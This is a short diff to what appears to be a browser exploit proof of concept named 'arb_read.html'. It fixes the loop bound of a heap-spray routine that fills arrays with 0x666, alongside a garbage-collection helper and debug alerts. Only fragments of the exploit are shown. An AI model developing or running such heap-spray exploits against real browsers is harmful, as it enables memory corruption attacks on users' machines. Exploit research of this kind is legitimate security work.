--- a/arb_read.html
+++ b/arb_read.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start with uint8 value:0xA12A");
+alert("start with uint8 value:0xA2A");
 function gc() {
     try {
         var c = document.createElement("canvas");
@@ -53,7 +53,7 @@ try{
     //alert(1)
     var spray = new Array(0x1000);
     alert(2)
-    for (var i=0; i<spray; i++) {
+    for (var i=0; i<0x1000; i++) {
         spray[i] = new Array(cnt);
         for (var j=0; j<cnt; j++) {
             spray[i][j] = 0x666
